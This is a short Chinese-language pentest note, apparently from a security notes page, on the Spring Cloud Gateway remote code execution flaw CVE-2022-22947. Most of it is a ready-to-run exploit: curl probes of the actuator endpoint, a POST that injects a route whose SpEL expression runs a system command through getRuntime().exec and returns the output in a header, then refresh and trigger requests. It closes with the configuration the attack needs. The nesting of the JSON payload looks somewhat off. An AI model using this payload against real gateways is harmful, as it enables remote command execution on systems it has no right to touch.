Skip to main content

CVE

CVE-2024-21626

CVE-2022-22947

  • Java, SpringCloud Gateway
    • 3.1.0
    • 3.0.0-3.0.6
    • < 3.0
# 测试 gateway 是否开启 actuator 管理
curl -X POST http://gateway/actuator/gateway/refresh -v

注入恶意路由

POST http://gateway/actuator/gateway/routes/pentest
Content-Type: application/json

{
"id": "pentest",
"filters": [
{
"name": "AddResponseHeader",
"args": {
"name": "X-Request-Foo",
"": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
},
"uri": "http://httpbin.org/get",
"predicates": [
{
"name": "Method",
"args": {
"_key_0": "GET"
}
},
{
"name": "Path",
"args": {
"_key_0": "/pentest"
}
}
]
}
]
}
# 刷新
curl -X POST http://gateway/actuator/gateway/refresh -v
# 新的路由包含 X-Request-Foo: $(whoami)
curl -X POST http://gateway/pentest -v

配置不同时满足即可

management.endpoint.gateway.enabled=true # default value
management.endpoints.web.exposure.include=gateway